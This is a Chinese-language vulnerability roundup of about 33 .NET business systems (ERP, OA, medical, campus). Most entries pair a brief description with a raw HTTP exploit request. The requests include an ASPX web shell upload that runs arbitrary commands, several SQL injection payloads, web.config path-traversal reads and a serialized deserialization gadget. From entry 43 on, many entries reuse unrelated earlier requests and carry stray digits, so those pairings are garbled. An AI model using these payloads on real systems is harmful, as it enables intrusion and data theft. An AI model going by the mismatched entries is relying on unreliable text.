53套.NET系统漏洞威胁情报(12.31更新)

某速ERP系统文件上传漏洞

53.1 漏洞概述

某速ERP管理系统File.ashx存在任意文件上传漏洞

POST /Api/File**.ashx?method=**Upload HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Connection: close
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/jpeg
<%@ Page Language="Jscript" validateRequest="false" %>
<%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

某特订单系统SQL注入

52.1 漏洞概述

某特网上订单管理系统getUser**.ashx存在SQL注入漏洞

GET /ajax/getUser**.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

某景ERP任意文件下载

51.1 漏洞概述

某景 GetFile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

GET /api/TM***te/GetFile?Full***FileName=/../web.config&FileName= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

某信公交系统存在SQL注入

50.1 漏洞概述

某信公交管理系统 ***Hours.aspx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。

GET /YZ**/Forms/X**/BM/Main****ment/Ad****Hours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

某环保监管系统文件SQL注入

49.1 漏洞概述

某环保监管平台依托创新的物联网电力传感技术，实时采集企业总用电、生产设备及环保治理设备用电数据，该系统某个接口存在注入风险。

GET /Main**r/GetEnterprise***Id?EnterpriseId=%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716a627871%2C0x647a457071654e45644d4c627a716c4d7948505a4d67756a786c70576a5a4f7749627a5449486562%2C0x7178767171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

某景ERP系统文件读取漏洞

48.1 漏洞概述

某景ERP是一款功能全面、高度集成、易于扩展的企业管理软件，能够帮助制造企业实现智能化、精益化管理，提升企业的竞争力和盈利能力。

GET /api/Down***/File?File**=/../web.config&Title= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

某行ERM系统SQL注入漏洞

47.1 漏洞概述

某行协同CRM普及版CommonDict/Edit 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

POST /crm/api/***/Common***/Edit?accesstoken=1&accesskey=1&timestamp=1&nonce=1&signature=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

enumType=69&data={"ID":"1","Name":"'+UNION+ALL+SELECT+@@VERSION--"}

某克医疗系统SQL注入漏洞

46.1 漏洞概述

某克电子技术有限公司医疗急救管理系统存在SQL注入漏洞。该应用的***Service存在SQL注入漏洞。

POST /a**/****vice.asmx HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: 
SOAPAction: http://tempuri.org/GetAmbulance
Content-Type: text/xml
Content-Length: 296
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
Host: 
Connection: Keep-alive

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://tempuri.org/">
 <soap:Header />
 <soap:Body>
  <tns:GetAmbulance>
   <tns:CNumber>11' AND 6537 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6537=6537) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)))-- ntgj</tns:CNumber>
  </tns:GetAmbulance>
 </soap:Body>
</soap:Envelope>

某地产ERP反序列化漏洞

45.1 漏洞概述

某地产ERP是一款专为房地产行业设计的企业资源规划系统，该应用的***Service存在反序列化漏洞。

POST /***Management/WebService/***Service.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/WriteLog"
cmd: dir
 
<?xml version="1.0" encoding="utf-8"?>
  <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
      <WriteLog xmlns="http://tempuri.org/">
        <request>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</request>
      </WriteLog>
    </soap:Body>
  </soap:Envelope>

某普EAP平台文件读取漏洞

44.1 漏洞概述

某普EAP企业管理平台 Download.aspx 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统文件，造成信息泄露。

GET /ID**/Common/**/Download.aspx?FileName=web.config&FileTitle=2 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36
Content-Type:application/x-www-form-urlencoded
Accept: */*
Connection: Keep-Alive

某户企业系统SQL注入漏洞

43.1 漏洞概述

某户企业管理系统productlist.aspx存在SQL注入漏洞，未授权的攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限。

GET /ajax/getUser**.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
0

某飞达系统敏感信息泄露漏洞

42.1 漏洞概述

某飞达系统***Login.asmx存在信息泄露漏洞，可以泄露账户密码。

GET /ajax/getUser**.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
1

某智OA办公系统SQL注入漏洞

41.1 漏洞概述

某智OA办公系统Login存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。

GET /ajax/getUser**.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
2

某盟云SQL注入漏洞

40.1 漏洞概述

某盟云系统接口 ajaxsenddingdingmessage 存在 SQL 注入漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重漏洞

GET /ajax/getUser**.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
3

某智慧平台文件读取漏洞

39.1 漏洞概述

某智慧平台ExpDownload***.aspx任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。

GET /ajax/getUser**.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
4

某知识系统文件上传漏洞

38.1 漏洞概述

某知识系统接口存在文件上传漏洞，未经身份验证的远程攻击者可以实现RCE

GET /ajax/getUser**.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
5

某商业ERP系统SQL注入漏洞

37.1 漏洞概述

某混ERP系统 Operater_Action接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。

GET /ajax/getUser**.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
6

某机械ERP文件读取漏洞

36.1 漏洞概述

某机械ERP DownloadInpFile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等

GET /ajax/getUser**.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
7

某热电系统SQL注入漏洞

35.1 漏洞概述

某热网系统 GetMenu** 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

GET /ajax/getUser**.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
8

某订单系统SQL注入漏洞

34.1 漏洞概述

某订单系统接口 /ajax/****order.ashx 接口存在SQL注入

GET /ajax/getUser**.ashx?locadCode=admin%27/**/and(select+1)>0waitfor/**/delay%270:0:5 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
9

某企业管理系统SQL注入

33.1 漏洞概述

**系统接口 /***/Login.as**接口存在SQL注入漏洞

GET /api/TM***te/GetFile?Full***FileName=/../web.config&FileName= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
0

某OA协同管理系统SQL注入

32.1 漏洞概述

**系统接口 /C6/****.Web.Work***/DBModules.aspx 接口存在SQL注入漏洞

GET /api/TM***te/GetFile?Full***FileName=/../web.config&FileName= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
1

某终端操作系统泄露敏感数据

31.1 漏洞概述

**系统接口 /report/Park***/GetData** 接口存在敏感数据泄露漏洞

GET /api/TM***te/GetFile?Full***FileName=/../web.config&FileName= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
2

某智慧校园系统文件上传漏洞

30.1 漏洞概述

**系统接口 /Module/File***/FileUp**.aspx 存在文件上传漏洞

GET /api/TM***te/GetFile?Full***FileName=/../web.config&FileName= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
3

某智慧校园系统文件读取漏洞

29.1 漏洞概述

**系统接口 /Module/File***/Down**.aspx 存在SQL注入漏洞

GET /api/TM***te/GetFile?Full***FileName=/../web.config&FileName= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
4

某ERP系统SQL注入漏洞-2

28.1 漏洞概述

**系统接口 /ashx/Default****.ashx 存在SQL注入漏洞

GET /api/TM***te/GetFile?Full***FileName=/../web.config&FileName= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
5

某OA系统存在SQL注入

27.1 漏洞概述

**系统接口 /WebService/Basic***.asmx 存在注入漏洞

GET /api/TM***te/GetFile?Full***FileName=/../web.config&FileName= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
6

某企业管理系统登录后台漏洞

26.1 漏洞概述

**系统接口 /Auth***/Index 存在任意账户登录漏洞

GET /api/TM***te/GetFile?Full***FileName=/../web.config&FileName= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
7

某ERP系统SQL注入漏洞

25.1 漏洞概述

**系统接口 /PDCA/ashx/CommentSta****.ashx 存在SQL注入漏洞

GET /api/TM***te/GetFile?Full***FileName=/../web.config&FileName= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
8

某票务管理系统SQL注入漏洞

24.1 漏洞概述

**系统接口 /System***/Comm/SeatMap***.ashx 存在SQL注入漏洞

GET /api/TM***te/GetFile?Full***FileName=/../web.config&FileName= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
9

某一卡通系统SQL注入漏洞

23.1 漏洞概述

**系统接口 /Data***.asmx 存在SQL注入漏洞

GET /YZ**/Forms/X**/BM/Main****ment/Ad****Hours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
0

某BPM系统SQL注入漏洞

22.1 漏洞概述

**系统接口 /WF/Comm/Han***.ashx 存在SQL注入漏洞

GET /YZ**/Forms/X**/BM/Main****ment/Ad****Hours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
1

某智慧协同系统SQL注入漏洞

21.1 漏洞概述

**系统接口 /third/DingTalk/Pages/***.aspx 存在SQL注入漏洞

